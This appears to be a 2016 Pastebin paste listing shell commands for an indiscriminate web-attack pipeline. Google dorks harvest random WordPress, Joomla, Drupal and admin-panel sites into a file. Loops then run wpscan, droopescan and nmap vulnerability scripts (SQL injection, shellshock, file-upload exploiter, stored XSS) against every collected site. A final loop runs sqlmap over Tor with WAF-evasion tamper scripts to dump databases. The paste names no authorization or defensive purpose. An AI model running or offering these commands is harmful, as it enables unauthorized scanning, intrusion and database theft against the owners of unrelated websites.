API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 5th, 2016
1,267
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.68 KB | None | 0 0
raw download clone embed print report
  1. atscan --random --dork inurl:/admin/ --level 100 --xss --lfi --wp
  2.  
  3. atscan --random --dork inurl:.php? --level 100 --xss --lfi --wp
  4.  
  5. atscan --random --dork inurl:wp-content/plugins/age-verification/age-verification.php --xss --lfi --wp
  6.  
  7. atscan --random --dork "error_log" inurl:/wp-content --level 100 --xss --lfi --wp
  8.  
  9. atscan --random --dork inurl:/node/add/announcement --level 100 --xss --lfi --wp
  10.  
  11. atscan --random --dork inurl:wp-login.php Register Username Password -echo --level 100 --xss --lfi
  12.  
  13.  
  14. php inurl.php --dork 'inurl:/node/add/announcement' -s output.txt -q 1,2,4,6
  15.  
  16. php inurl.php --dork 'inurl:wp-login.php Register Username Password -echo' -s output.txt -q 1,2,4,6 --command-all
  17.  
  18. php inurl.php --dork '"powered by joomla 3.2" OR "powered by joomla 3.3" OR "powered by joomla 3.4"' -s output.txt -q 1,2,4,6
  19.  
  20. php inurl.php --dork 'inurl:"index.php?option=com_jeajaxeventcalendar"' -s output.txt -q 1,2,4,6
  21.  
  22. php inurl.php --dork 'inurl:moadmin.php' -s output.txt -q 1,2,4,6
  23.  
  24. php inurl.php --dork 'inurl:moadmin.php?' -s output.txt -q 1,2,4,6
  25.  
  26. php inurl.php --dork 'inurl:/cgi' -s output.txt -q 1,2,4,6
  27.  
  28. for site in $(cat output/output.txt) ; do droopscan scan drupal -u $site ; done
  29.  
  30. for site in $(cat output/output.txt) ; do droopscan scan wordpress -u $site ; done
  31.  
  32. for site in $(cat output/output.txt) ; do wpscan --url $site --enumerate u ; done
  33.  
  34. for site in $(cat output/output.txt) ; do wpscan --url $site --enumerate p ; done
  35.  
  36. for site in $(cat output/output.txt) ; do droopscan scan joomla -u $site ; done
  37.  
  38. for site in $(cat output/output.txt) ; do droopscan scan silverstripe -u $site ; done
  39.  
  40. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-wordpress-enum $site ; done
  41.  
  42. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-wordpress-users $site ; done
  43.  
  44. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-csrf $site ; done
  45.  
  46. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-sql-injection $site ; done
  47.  
  48. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-shellsock $site ; done
  49.  
  50. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-fileupload-exploiter $site ; done
  51.  
  52. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-robots.txt $site ; done
  53.  
  54. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-stored-xss $site ; done
  55.  
  56. for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-frontpage-login $site ; done
  57.  
  58. SQLI
  59.  
  60. for site in $(cat output/output.txt) ; do sqlmap --tor --url $site --random-agent --flush-session --level 3 --risk 3 --tamper charencode.py,modsecurityzeroversioned.py --batch --forms --dbs ; done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!